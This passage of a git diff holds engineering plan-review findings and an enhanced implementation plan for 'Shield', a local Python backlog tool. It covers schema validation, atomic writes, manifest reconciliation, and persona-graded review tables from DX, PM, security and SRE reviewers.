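    """Map feature slug to parsed plan.json for features flagged plan_json.

    The plan path is derived as <root>/<feature name>/plan.json because the
    manifest stores only a boolean flag, not a path.
    """
    plans = {}
    for feature in manifest.get("features", []):
        name = feature.get("name")
        if not name or not feature.get("artifacts", {}).get("plan_json"):
            continue
        path = root / name / "plan.json"
        try:
            plans[name] = json.loads(path.read_text(encoding="utf-8"))
        except (OSError, json.JSONDecodeError):
            # Missing or unreadable plan: leave the feature out so the
            # reconciler treats it as doubt rather than crashing.
            continue
    return plans
```

A feature left out of the result has no gating plan, so under never-remove-on-doubt its backlog entries would simply stay.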

-

P0-2 — F8 "match existing-epic by id" matches a positional slot, not a stable identity

-

Epic ids are positional EPIC-N slugs assigned by /plan, not durable identifiers. After any re-/plan, EPIC-2 points at a different epic. An existing-epic backlog entry stamped EPIC-2 will then match the wrong epic (false removal) or fail to match (entry rots). Verified: plan-trd-refactor-20260524 EPIC-2 = "Story schema and design traceability" vs pm-restructure-v0-20260521 EPIC-2 = "Global authoring…".
Fix: match existing epics by normalized name too (same predicate as proposed-new); treat EPIC-N only as a within-a-single-plan disambiguator. If id-matching is kept, document the re-plan failure mode and add an "epic reordered across a re-plan" eval.

-

P0-3 — Kill switch backlog.auto_reconcile cannot live in .shield.json as the schema stands

-

shield/schemas/shield.schema.json has additionalProperties: false and properties [project, domains, output_dir, reviewers, devcontainer, external_skills] — no backlog key. Adding backlog.auto_reconcile to a real .shield.json fails validation, and no story includes the schema change.
Fix: add a task+AC (EPIC-3-S3, reflected in EPIC-4-S2 version bump) to extend shield.schema.json with an optional backlog object ({auto_reconcile: bool, default true}) + a config example. Without this the documented first-line rollback (TRD §14) is unshippable.

-

P1 findings

-
  • P1-1 — Concurrency eval tests a race the single-writer design says cannot occur. Nothing enforces serialization (no lock). Either the race can't happen (eval vacuous) or it can (read-modify-write is not atomic — os.replace() only makes the rename atomic; loser's entry is silently dropped). Resolve: rescope to sequential, OR add a minimal compare-before-replace/merge and test it.
  • P1-2 — F2/EPIC-1-S1 AC says "the schema rejects duplicate id"; JSON Schema (2020-12) cannot express property-level array uniqueness. Reword to "the validator (validate_backlog.py) rejects duplicate id with duplicate_entry_id."
  • P1-3 — Feature "name" (manifest) vs "folder slug" (reconciliation key) conflated. Pin the invariant (features[].name == folder slug) and make suggest_feature return that field; add a fixture asserting the suggested value resolves to an existing docs/shield/<value>/ path.
  • P1-4 — Packaging model unresolved. F3 ("every capturing skill builds against this signature") implies an importable module, but EPIC-4-S2 hedges ("if backlog scripts are packaged"). Decide at plan time — recommend packaging with a pyproject.toml so the version bump is unconditional; document how a skill calls capture().
-
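For P1-2, the uniqueness check that JSON Schema cannot express would live in the validator itself. The sketch below assumes string ids and an `entries` array as described in EPIC-1-S1; the exception class `DuplicateEntryId` and the function `check_unique_ids` are hypothetical names, while the `duplicate_entry_id` error label comes from the finding.

```python
from collections import Counter


class DuplicateEntryId(ValueError):
    """Raised when two backlog entries share the same id."""


def check_unique_ids(doc: dict) -> None:
    """Raise DuplicateEntryId naming every id that appears more than once."""
    counts = Counter(entry["id"] for entry in doc["entries"])
    dupes = sorted(entry_id for entry_id, n in counts.items() if n > 1)
    if dupes:
        raise DuplicateEntryId(f"duplicate_entry_id: {', '.join(dupes)}")
```

Such a check would run after schema validation, so shape errors and identity errors can be reported under separate named errors.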

P2 findings

-
  • P2-1 — Atomic write omits os.fsync() before os.replace() (power-loss window) and uses a fixed .tmp name (stale-temp collision). Add fsync + unique temp suffix.
  • P2-2 — read() -> dict forces every caller to re-validate shape; consider returning the pydantic model (read() -> BacklogDoc).
  • P2-3 — RemovalDecision / Candidate payloads referenced but RemovalDecision's fields (the F9 log fields) are undefined. Add a 4-field dataclass in lld-reconciler.md.
-
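The P2-1 recommendation (fsync plus a unique temp name before the rename) could look like this sketch. The helper name `atomic_write_json` and the `.backlog-` temp prefix are assumptions; the standard-library calls (`tempfile.mkstemp`, `os.fsync`, `os.replace`) are used as documented.

```python
import json
import os
import tempfile


def atomic_write_json(path: str, doc: dict) -> None:
    """Write doc to path via a uniquely named temp file in the same directory.

    The temp file is flushed and fsynced before os.replace() swaps it in,
    so a crash leaves either the old file or the complete new one.
    """
    directory = os.path.dirname(os.path.abspath(path))
    fd, tmp = tempfile.mkstemp(dir=directory, prefix=".backlog-", suffix=".tmp")
    try:
        with os.fdopen(fd, "w", encoding="utf-8") as handle:
            json.dump(doc, handle, indent=2)
            handle.flush()
            os.fsync(handle.fileno())
        os.replace(tmp, path)  # atomic rename within one filesystem
    except BaseException:
        # Clean up the temp file if anything failed before the rename.
        try:
            os.unlink(tmp)
        except FileNotFoundError:
            pass
        raise
```

This addresses torn files and stale temp collisions only. It does not prevent the lost-update case raised in P1-1, which still needs a lock or a re-read-and-merge step.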

Verification sources: shield/schemas/plan.schema.json, shield/schemas/shield.schema.json, docs/shield/manifest.json.

diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/dx-engineer.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/dx-engineer.html
deleted file mode 100644
index 3c6c1ab6..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/dx-engineer.html
+++ /dev/null
@@ -1,159 +0,0 @@
Shield Plan Review — Backlog

DX Engineer — Detailed Findings

-
-

Back to summary

-
-

Persona grade: A−. An unusually handoff-ready plan — locked signatures, named errors, an atomic-write recipe, and a kill switch make most stories startable without tribal knowledge. Falls short of A on two interface contracts a developer hits in M1/M3 that are referenced but not pinned.

-

Evaluation points (A–F)

| # | Point | Grade | Note |
|---|-------|-------|------|
| DX1 | Plan clarity | A | TRD "In one line" + Milestones table convey the goal in <30s. |
| DX2 | Story actionability | A− | Each story has description + tasks + ACs + design_refs. |
| DX3 | Implementation step detail | A− | Exact file paths, locked signature, write recipe, validator command. |
| DX4 | Ambiguity audit | B+ | "LOCKED" decisions, named errors; residual: N2 "≲1s", "audit cadence (e.g. monthly)". |
| DX5 | Context sufficiency | A | PRD framing, TRD §1 reader list, §8 alternatives, carried-forward trace. |
| DX6 | Dependency clarity | A | Milestone DAG + explicit EPIC-3-S3 intra-epic dependency. |
| DX7 | Tool & access requirements | B | uv named; missing Python version + pydantic/jsonschema prereq statement. |
| DX8 | Handoff readiness | A− | Locked signatures, named errors, atomic-write recipe, kill-switch key. |
| DX9 | Service boundaries | A | Three components cleanly separated; single writer. |
| DX10 | API & data flow design | B+ | manifest.json field names not pinned as ground truth. |
| DX11 | Deployment strategy | A− | Additive behind kill switch; 3-tier rollback. |
| DX12 | CI/CD integration | B+ | Path glob named, but CI entrypoint still a task, not a value. |
| DX13 | Error handling patterns | A | Failure modes enumerated per component; never-remove-on-doubt. |
| DX14 | Configuration management | A− | One config key fully specified; recovery log path defined. |
| DX15 | Developer onboarding | B+ | Dry-run loop mandated but not yet written. |

Findings

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
| Priority | Point | Recommendation |
|---|---|---|
| P1 | DX10 | Pin the manifest.json read-contract in TRD §11 (exact keys read + example) so EPIC-2-S1/EPIC-3-S2 don't reverse-engineer the live file. (Overlaps backend P0-1.) |
| P1 | DX12 | Resolve the CI entrypoint to a concrete value (the actual workflow file + runner), not a task, so the eval-gate AC is verifiable. |
| P2 | DX4/DX15 | Replace "e.g. monthly" audit cadence with a fixed interval + numeric trigger (lift PRD §7 thresholds verbatim). |
| P2 | DX7/DX15 | State runtime prereqs once in the backlog SKILL.md (Python ≥3.x via uv; validator uses pydantic+jsonschema). |
| P2 | DX1 | Label the two composites inline — PRD-review 3.12 vs plan-review 3.14 — to avoid a misread in the plan.md header. |
-

No P0 findings from DX: the deferred TRD is present and complete, the prior P0 (gate-0d) is folded, locked decisions propagate consistently, every story has self-contained ACs.

- - diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/product-manager.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/product-manager.html deleted file mode 100644 index dfa5731a..00000000 --- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/product-manager.html +++ /dev/null @@ -1,109 +0,0 @@ - - - -Shield Plan Review — Backlog - -

Product Manager — Detailed Findings (PM1–PM10 decomposed)

-
-

Back to summary

-
-

Persona grade: A (average of 10 dim grades = 3.6). Dispatched as 10 parallel dim subagents per the pm-restructure-v0 registry.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
| Dim | Name | Severity | Grade | Gap / note |
|---|---|---|---|---|
| PM1 | User impact clarity | Critical | A | Named personas (P1 Ashwini/maintainer, P2 the agent); concrete impact; §7 numeric magnitude. |
| PM2 | Problem-solution fit | Critical | A | "nowhere to park that work" → ordered store + reconciliation directly fits. |
| PM3 | Scope discipline (plan) | Important | A | Explicit out-of-scope (hooks, per-feature, state machine, pm-sync, locking) + §8 alternatives + validate-the-bet gate. Opposite of kitchen-sink. |
| PM4 | Prioritization rationale | Important | B | Sequencing + named deps + PM10 value-gate present, but no effort/impact estimates per phase; priorities nearly all "high". |
| PM5 | Stakeholder communicability | Important | B | TRD "In one line" + PRD §3 give a plain entry point, but docs are otherwise pervasively engineering-framed; no dedicated stakeholder/executive summary. |
| PM6 | Market / competitive awareness | Warning | B | PM-tool backlog named as incumbent + differentiated, but the buy-vs-build case is asserted, not reasoned. |
| PM7 | Adoption & rollout risk | Important | A | Capture-friction risk + mitigation; the no-hooks bet surfaced as an unvalidated assumption. |
| PM8 | Success metrics | Important | A | Four §7 metrics, three with numeric thresholds + counters; manual measurement mechanism named (no telemetry). |
| PM9 | Reversibility & exit cost | Warning | A | TRD §14 graded exit ramp (kill switch → revert/replay → PR back-out) tied to observable triggers. |
| PM10 | Business value alignment | Critical | B | Tied to real operational pain + measurable outcome, but the load-bearing value premise is explicitly unvalidated (no baseline) and links to internal-workflow pain, not a named OKR. |
-

Consolidated PM recommendations (P2)

-
    -
  • PM4: add a coarse effort estimate (t-shirt/points) + one-line impact per milestone so M1→M2→M3 is justified by impact-per-effort, not dependency chains alone.
  • -
  • PM5: add a 3–4 sentence stakeholder/executive summary near the top of the PRD (or promote the TRD one-liner) stating what + business-why in plain language before the jargon.
  • -
  • PM6: add 1–2 sentences making the buy-vs-build case explicit — why the ClickUp/Jira backlog can't serve as the pre-pipeline staging area (not co-located with manifest.json/plan.json, no reconciliation against Shield artifacts, would pollute the PM board of record).
  • -
  • PM10: state the operational cost the tool recovers in concrete terms (ideas lost/re-derived per week, or maintainer re-scoping time) so the "justifies the tool" bet has a falsifiable target the 30-day v1 audit can measure against.
  • -
-

No P0/P1 from the PM persona — all four sub-B dims are Important/Warning-severity B grades (→ P2).

- - diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/security-engineer.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/security-engineer.html deleted file mode 100644 index da925030..00000000 --- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/security-engineer.html +++ /dev/null @@ -1,170 +0,0 @@ - - - -Shield Plan Review — Backlog - -

Security Engineer — Detailed Findings

-
-

Back to summary

-
-

Persona grade: A−. Security-mature for its surface (single-actor local tool over a plaintext git-tracked store of developer idea text — no PII/auth/network). Threat model is honest, trust boundaries are clean, and security claims are pinned to executable, falsifiable ACs. The four folded prior-review findings are all present, correctly threat-framed, and sufficient. Lands A− (not A) because the recovery layer (N4) and single-writer claim (N5) rest on ordering/assumption guarantees not yet pinned to tests.

-

Folded-finding verification

- - - - - - - - - - - - - - - - - - - - - - - - - -
| Folded finding | Sufficient? |
|---|---|
| Malformed/partial read refused with BacklogInvalid (F5) | Yes — "single integrity primitive" (TRD §9), concrete AC |
| Concurrency eval: no corruption AND no lost entry | Yes — correctly distinguishes lost-entry (RMW race) from corruption (crash mid-write) |
| No-stamping eval (F6): plan.json byte-unchanged | Yes — byte-unchanged is the right assertion |
| Epic-name collision across features → ambiguous → stays | Yes — fixture exists (ambiguous-match-stays) |
-

Evaluation points (A–F)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
| # | Point | Grade |
|---|---|---|
| SE1 | Threat model coverage | A− |
| SE2 | Least-privilege design | A |
| SE3 | Data protection | A |
| SE4 | Secrets management | A |
| SE5 | Network security | N/A |
| SE6 | Access control | N/A |
| SE7 | Compliance | N/A |
| SE8 | Incident response | A− |
| SE9 | Acceptance criteria quality | A |
| SE10 | Edge case & rollback coverage | A− |
| SE11 | Integration test strategy | A |
| SE12 | Regression risk | A |
| SE13 | Environment validation | B+ |
| SE14 | Security validation | A− |
-

Findings

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
| Priority | Point | Recommendation |
|---|---|---|
| P1 | SE10/SE1 (P1-a) | No detection for a violated single-writer assumption (N5). If violated, the outcome is a silent lost update. Add a cheap compare-before-replace: capture()/remove() carry the schema_version+entry-count (or mtime/hash) read at start and refuse os.replace() if the on-disk file changed underneath — converts a silent lost-update into a loud BacklogInvalid refusal without a lockfile. (Also resolves backend P1-1.) |
| P1 | SE14/SE9 (P1-b) | Write-side validation is asserted ("validate-or-refuse on read/write") but only read-side + crash-mid-write are tested. Add AC+eval: "capture() that would produce a schema-invalid document raises BacklogInvalid and leaves backlog.json byte-unchanged (no .tmp promoted)." |
| P1 | SE10/SE14 (P1-c) | The recovery-sink ordering (append-before-remove) is stated in prose but not pinned to a test. Strengthen the recovery-rehearsal eval to assert recoverability across a simulated crash at the ordering seam (after append/before remove; after remove/before commit). |
| P2 | SE1/SE8 (P2-a) | .shield/backlog-removed.log is a new write surface with no integrity story (no schema, no validate-or-refuse, git-tracked status unspecified). Specify tracked/ignored + read it back through a defined parser in the recovery eval. |
| P2 | SE13 (P2-b) | Dry-run isolation is a doc task, not a guarded invariant; the lazy sweep runs on every view. Make dry-run/fixture mode provably non-destructive (force kill switch off, or disable sweep when a fixture path is supplied) + add to the eval matrix. |
| P2 | SE1 (P2-c) | Migration is doc-only (correct for v1); add a forward note that any future migrate() must itself be validate-or-refuse (a half-migrated write is the next corruption vector). |
-

No P0 findings from security.

- - diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/sre.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/sre.html deleted file mode 100644 index f342c0aa..00000000 --- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/sre.html +++ /dev/null @@ -1,145 +0,0 @@ - - - -Shield Plan Review — Backlog - -

SRE / Operations — Detailed Findings

-
-

Back to summary

-
-

Persona grade: A−. Operationally mature: all four prior SRE findings landed with verbatim fidelity; failure-mode analysis is genuinely strong (safe-failure direction is explicit and testable). Remaining risk is concentrated in the N4 recovery path.

-

Prior-finding verification

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
| Finding | Landed? | Sufficient? |
|---|---|---|
| OP1 — log every removal with rationale {entry id, feature, epic, match-kind, triggering run, gating plan.json path} | Yes (TRD §5 F9, EPIC-3-S2, lld-reconciler §10) | Yes — elevated to single integrity surface (TRD §9) |
| OP7 — kill switch | Yes (TRD §5 F10, §14, EPIC-3-S3, lld-reconciler §9) | Mostly — see P2-1: a single boolean disables both; "independently" is not actually delivered |
| OP4 — uncommitted-state recovery gap | Yes (TRD §6 N4, §9, §14, EPIC-3-S3, lld-reconciler §8) | Yes for eager path; see P1-1 — the OR is unresolved |
| OP2/OP5 — N2 latency instrumented | Yes (TRD §6 N2, EPIC-3-S3, lld-reconciler §10/§12.4) | Yes — wired to a §14 rollback trigger |
-

Evaluation points (A–F)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
| # | Point | Grade |
|---|---|---|
| OP1 | Observability plan | A |
| OP2 | Monitoring & alerting | B |
| OP3 | Failure mode analysis | A |
| OP4 | Backup & recovery | B+ |
| OP5 | Capacity planning | A− |
| OP6 | Change management | A |
| OP7 | On-call readiness | B+ |
-

Findings

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
| Priority | Point | Recommendation |
|---|---|---|
| P1 | OP4 (P1-1) | N4 recovery mechanism is an unresolved OR with divergent semantics (commit-before-prune → git revert, vs removed-log → replay). The §14 runbook can't be written precisely. Pick one v1 default — recommend removed-log (avoids forcing a possibly-dirty-tree commit on every prune; decouples recovery from git state, which matters mid-/implement). Make the other an explicit non-goal; update EPIC-3-S3 AC + §14 step 2. |
| P2 | OP7 (P2-1) | Kill switch doesn't disable triggers "independently" — one coupled boolean. Drop the "independently" framing (coupled is the right v1 scope) or split into auto_reconcile.eager/.lazy. |
| P2 | OP2 (P2-2) | Wrong-removal detection is pull-only (operator must read the log). Have /backlog view surface "N entries removed since last view (see backlog-removed.log)" when the log grows. |
| P2 | OP4 (P2-3) | Removed-log lifecycle undefined (git-tracked vs gitignored, rotation, max size). Specify — and the tracked/ignored choice ties to P1-1. |
| P2 | OP7 (P2-4) | EPIC-4-S2 AC lists feature docs for SKILL.md but not the recovery procedure. Add: SKILL.md documents wrong-removal recovery (flip kill switch → locate F9 log line → revert/replay). |
| P2 | OP7 (P2-5) | Audit interval still "e.g. monthly" — commit to an actual interval. |
| P2 | OP1 (P2-6) | Specify no-op eager prune logging (if lazy sweep beat it): "no-op prune emits no log line" to avoid duplicate recovery records. |
-

No P0 findings.

- - diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/enhanced-plan.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/enhanced-plan.html deleted file mode 100644 index 1983554a..00000000 --- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/enhanced-plan.html +++ /dev/null @@ -1,207 +0,0 @@ - - - -Shield Plan Review — Backlog - - - -

Plan — Shield Backlog (enhanced 2026-05-29)

-

Project: Shield · Phase: v1 · Domain: backend (Python)
PRD: prd.md (PRD-review Ready, composite 3.12) · TRD: trd.md · Sidecar: plan.json
Plan-review: Ready, composite 3.49 (B+) — conditional on the 3 P0 fixes below.

-
-

Changes applied in this enhanced version (review 2026-05-29):

-
    -
  • P0-1 / P0-2 / P0-3 folded into EPIC-3-S2, EPIC-3-S3, EPIC-1-S1, and a new schema task.
  • -
  • P1s (recovery-OR resolution, lost-update detection, dup-id wording, name==slug, packaging, CI entrypoint, write-side + ordering-seam evals) folded into the affected stories.
  • -
  • P2s recorded as inline [P2] notes for the implementer to pick up opportunistically.
  • -
-
-

Milestones

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
| ID | Name | Depends on | Touches LLD | Outcome |
|---|---|---|---|---|
| M1 | Capture + store + view | | backlog-store | backlog.json + schema/validator; capture (user + skill, atomic, validate-or-refuse, lost-update detection); /backlog ordered view with manifest status badges; manual remove. |
| M2 | Feature + epic association + suggestion | M1 | epic-suggester | Every entry carries feature + epic; agent suggests via exact-normalized match against the pinned manifest/plan shapes; user accept/replace/create-new. |
| M3 | Promotion + reconciliation | M2 | reconciler | Promotion via transient reference; reconciliation engine (single "epic landed" predicate matching existing epics by name, never-remove-on-doubt, drift tolerance, removal logging); eager + lazy idempotent triggers + kill switch (incl. .shield.json schema change); eval suite + version bump. |
-
-

EPIC-1 — Store, schema & capture (M1)

-

EPIC-1-S1 · Define backlog.json schema and validator (high)

-

Define backlog.json shape + JSON Schema with a top-level schema_version, plus a Python validator. Entry: {id, order:int, kind∈{epic,story,task}, source∈{user,agent}, feature, epic, text}.

-
    -
  • Tasks: author shield/schema/backlog.schema.json; id = uuid4 string; document entry shape + migration policy (doc-only until schema_version 2) in shield/skills/general/backlog/SKILL.md; create shield/scripts/validate_backlog.py; ordering = single integer order. -
      -
    • [P1-2 — fix] Uniqueness of id across entries[] is enforced by validate_backlog.py (named error duplicate_entry_id), not by the JSON Schema — draft 2020-12 uniqueItems is whole-item equality and cannot express property-level uniqueness. Reword F2 + the AC accordingly.
    • -
    • [P1-3 — fix] Document the invariant manifest features[].name == feature folder slug (the reconciliation key) in the SKILL.md, since suggestion + reconciliation both rely on it.
    • -
    • [P2] State runtime prereqs once (Python ≥3.x via uv; validator uses pydantic + jsonschema).
    • -
    -
  • -
  • AC: schema rejects unknown kind/source (named error); the validator rejects duplicate id (duplicate_entry_id); validate_backlog.py exits 0/non-zero correctly; schema_version + migration policy present; id is a uuid4 string.
  • -
  • Design: TRD §11 APIs Involved · LLD backlog-store §4 Data model
  • -
-
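The [P1-2] point, that id uniqueness has to live in the validator because `uniqueItems` only compares whole items, might look like the sketch below. The exception shape (a `code` attribute) and the function name `check_unique_ids` are assumptions for illustration; only `BacklogInvalid`, `duplicate_entry_id`, and `entries[]` come from the plan.

```python
from collections import Counter


class BacklogInvalid(Exception):
    """Named validation error; the `code` attribute is an assumed convention."""

    def __init__(self, code: str, detail: str) -> None:
        super().__init__(f"{code}: {detail}")
        self.code = code


def check_unique_ids(doc: dict) -> None:
    """Reject a backlog document in which two entries share the same id."""
    counts = Counter(entry["id"] for entry in doc.get("entries", []))
    duplicates = sorted(entry_id for entry_id, n in counts.items() if n > 1)
    if duplicates:
        raise BacklogInvalid("duplicate_entry_id", ", ".join(duplicates))
```

Two entries with the same `id` but different `text` are distinct items under whole-item equality, which is why a schema-only check would let them through.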

EPIC-1-S2 · Capture entrypoint (user + skill) with atomic write + lost-update detection (high)

-

Capture usable by the user (/backlog add) and any skill (documented capture() helper). Atomic temp-then-rename + validate-or-refuse.

-
    -
  • Tasks: /backlog add (assigns next order + uuid4 id); LOCKED signature capture(text, *, kind="task", feature=None, epic=None, source) -> str in shield/scripts/backlog_store.py, raising BacklogInvalid; LOCKED single-writer (no lock) → full doc → .tmp → os.replace(). -
      -
    • [P1-1 — fix] Add compare-before-replace: capture()/remove() capture the on-disk schema_version+entry-count (or mtime/hash) at read time and refuse the os.replace() if the file changed underneath, raising BacklogInvalid. Converts a silent lost-update (the real N1/N5 threat) into a loud refusal without a lockfile.
    • -
    • [P1-4 — fix] Package backlog_store as an importable module with a pyproject.toml (F3 requires skills to import capture()); document the import path. Makes the EPIC-4-S2 version bump unconditional.
    • -
    • [P2] os.fsync() the temp fd before os.replace(); use a unique .tmp suffix (pid/uuid). Consider read() -> BacklogDoc (pydantic) over raw dict.
    • -
    -
  • -
  • AC: user + skill capture both work; interface documented + pinned in TRD §11; mid-write kill leaves no corruption; a concurrent on-disk change between read and replace is refused with BacklogInvalid (no lost entry); malformed/partial read refused with BacklogInvalid.
  • -
  • Design: TRD §5 Functional Requirements · LLD backlog-store §5 API contracts
  • -
-
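The compare-before-replace idea in [P1-1] can be sketched as follows, assuming the content-hash variant of the fingerprint. The function is named `capture_to` and takes an explicit `path` so it is not mistaken for the LOCKED `capture()` signature; the `before_replace` hook is a test-only assumption used to simulate a second writer.

```python
import hashlib
import json
import os
import tempfile
import uuid


class BacklogInvalid(Exception):
    """Raised when the store is malformed or changed underneath the writer."""


def capture_to(path, text, *, kind="task", feature=None, epic=None,
               source, before_replace=None):
    """Append one entry; refuse the write if the file changed since it was read."""
    with open(path, "rb") as handle:
        raw = handle.read()
    seen = hashlib.sha256(raw).hexdigest()  # fingerprint of the version we edited
    try:
        doc = json.loads(raw)
        entries = doc["entries"]
        next_order = max((e["order"] for e in entries), default=0) + 1
    except (ValueError, KeyError, TypeError) as exc:
        raise BacklogInvalid(f"unreadable store: {exc}") from exc

    entry_id = str(uuid.uuid4())
    entries.append({"id": entry_id, "order": next_order, "kind": kind,
                    "source": source, "feature": feature, "epic": epic,
                    "text": text})

    directory = os.path.dirname(os.path.abspath(path))
    fd, tmp_path = tempfile.mkstemp(suffix=".tmp", dir=directory)
    try:
        with os.fdopen(fd, "w", encoding="utf-8") as handle:
            json.dump(doc, handle)
            handle.flush()
            os.fsync(handle.fileno())
        if before_replace is not None:
            before_replace()  # test hook only: stands in for a concurrent writer
        with open(path, "rb") as handle:
            current = hashlib.sha256(handle.read()).hexdigest()
        if current != seen:
            raise BacklogInvalid("backlog.json changed on disk since it was read")
        os.replace(tmp_path, path)
    except BaseException:
        if os.path.exists(tmp_path):
            os.unlink(tmp_path)  # never promote or leak the temp file
        raise
    return entry_id
```

This narrows the lost-update window without a lockfile but does not close it: a write landing between the final comparison and `os.replace()` would still be overwritten. That matches the plan's framing of detection for a violated single-writer assumption, not mutual exclusion.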

EPIC-1-S3 · /backlog view — ordered list (high)

-

/backlog command + skill rendering entries sorted by order with feature + epic + source.

-
    -
  • Tasks: author shield/commands/backlog.md + backlog/SKILL.md; render sorted; define render-line format once; document a provably non-destructive local-dev/dry-run loop; empty-backlog message. -
      -
    • [P2 — security] Dry-run/fixture mode MUST force the lazy sweep off (the sweep runs on every real view) so testing a fixture can't mutate the project store.
    • -
    -
  • -
  • AC: ascending-order list with feature/epic/source; clean empty message; command registered; dry-run mode runs no sweep against the project store.
  • -
  • Design: TRD §4 Product Journey
  • -
-

EPIC-1-S4 · Manual remove from /backlog (medium)

-

/backlog remove <id> — plain delete.

-
    -
  • Tasks: remove <id> via atomic helper; confirm-before-delete; clear error on absent id; document the recoverability boundary (uncommitted manual remove is unrecoverable by design — N4).
  • -
  • AC: deletes + persists atomically; absent id = clear no-op error; no history retained.
  • -
  • Design: TRD §5 Functional Requirements · LLD backlog-store §5 API contracts
  • -
-
-

EPIC-2 — Association & pipeline status (EPIC-2 deliberately straddles M1/M2 — see note)

-
-

[P2 — agile] EPIC-2-S1 (status badges) ships with the M1 view; EPIC-2-S2 (association + suggestion) is the M2 deliverable. This straddle is intentional, not a numbering slip.

-
-

EPIC-2-S1 · Per-entry pipeline status from manifest.json (high, M1)

-
    -
  • Tasks: read manifest; render status badges; pin badge string research ✓ prd ✓ plan –; not started when feature absent; compute at view time. -
      -
    • [P0-1 — fix] Read against the pinned manifest contract (see TRD §11 addition): manifest.json = {schema_version, features:[{name, artifacts:{research,prd,plan_json,...}}]} — a list keyed by name, plan_json is a boolean flag, no plan path stored.
    • -
    -
  • -
  • AC: badges derived from the pinned manifest shape; prd-but-no-plan shows prd ✓ plan – and stays; absent feature → not started.
  • -
  • Design: TRD §7 High-Level Design
  • -
-
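A sketch of the badge derivation against the pinned manifest shape follows. Only `plan_json` is stated to be a boolean; treating `research` and `prd` as truthy flags is an assumption here, as is the function name `status_badge`.

```python
def status_badge(manifest: dict, feature: str) -> str:
    """Render the pipeline badge for one feature from the parsed manifest.json."""
    for item in manifest.get("features", []):  # features is a list keyed by name
        if item.get("name") == feature:
            artifacts = item.get("artifacts", {})
            # (label shown to the user, key read from artifacts)
            columns = [("research", "research"), ("prd", "prd"), ("plan", "plan_json")]
            return " ".join(
                f"{label} {'✓' if artifacts.get(key) else '–'}"
                for label, key in columns
            )
    return "not started"  # feature absent from the manifest


manifest = {
    "schema_version": 1,
    "features": [
        {"name": "backlog-20260527",
         "artifacts": {"research": True, "prd": True, "plan_json": False}},
    ],
}
print(status_badge(manifest, "backlog-20260527"))  # research ✓ prd ✓ plan –
print(status_badge(manifest, "unknown-feature"))   # not started
```

Because the badge is computed at view time from the manifest alone, nothing is written back to the backlog entry.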

EPIC-2-S2 · Feature + epic association + agent suggestion (high, M2)

-
    -
  • Tasks: prompt/accept feature + epic (allow proposed-new); LOCKED exact-normalized match (casefold() + collapsed ws); suggest by scanning manifest + candidate plan.json; never block capture; tie → surface all, auto-pick none. -
      -
    • [P0-1 — fix] suggest_feature(text, *, manifest) and suggest_epic(text, *, feature, plans) are typed against the real shapes: manifest.features[].name; plans is dict[feature-slug → parsed plan.json], the path derived as docs/shield/<slug>/plan.json for features with artifacts.plan_json == true.
    • -
    • [P1-3 — fix] suggest_feature returns features[].name, which is the folder slug (invariant pinned in EPIC-1-S1).
    • -
    -
  • -
  • AC: every entry has feature + epic; ≥1 feature + ≥1 epic candidate when matches exist; auth fixture surfaces auth top candidate + 2-way tie auto-picks neither; a suggested feature value resolves to an existing docs/shield/<value>/ path; capture succeeds proposed-new when none.
  • -
  • Design: TRD §5 Functional Requirements · LLD epic-suggester §5 API contracts
  • -
-
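The LOCKED exact-normalized match (`casefold()` plus collapsed whitespace) and the tie rule (surface all, auto-pick none) could be expressed as the sketch below. The helper names `normalize`, `match_candidates`, and `auto_pick` are hypothetical and not taken from the LLD.

```python
from typing import List, Optional


def normalize(name: str) -> str:
    """Casefold and collapse runs of whitespace to single spaces."""
    return " ".join(name.casefold().split())


def match_candidates(query: str, names: List[str]) -> List[str]:
    """Return every name whose normalized form equals the normalized query."""
    key = normalize(query)
    return [name for name in names if normalize(name) == key]


def auto_pick(candidates: List[str]) -> Optional[str]:
    """Pick a candidate only when it is unambiguous; a tie picks nothing."""
    return candidates[0] if len(candidates) == 1 else None
```

With names `["Auth", "auth  service", "AUTH"]`, the query `"auth"` yields two candidates (`"Auth"` and `"AUTH"`), so `auto_pick` returns `None` and both are shown to the user.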
-

EPIC-3 — Promotion & reconciliation (M3)

-

EPIC-3-S1 · User-driven promotion with transient reference (high)

-

/backlog promote <id> launches the user-chosen step and passes the entry id as a transient runtime reference — never stamped into plan.json (F6).

-
    -
  • AC: promotion starts the chosen step + forwards the reference; reference not persisted (F6); tool never auto-routes.
  • -
  • Design: TRD §4 Product Journey
  • -
-
-

Intra-epic dependency: EPIC-3-S3 consumes EPIC-3-S1 + EPIC-3-S2 and lands after both.

-
-

EPIC-3-S2 · Reconciliation engine (match key + never-remove-on-doubt) (high)

-

Locate feature in manifest.json; if it has a plan.json, apply the single "epic landed" predicate (F8).

-
    -
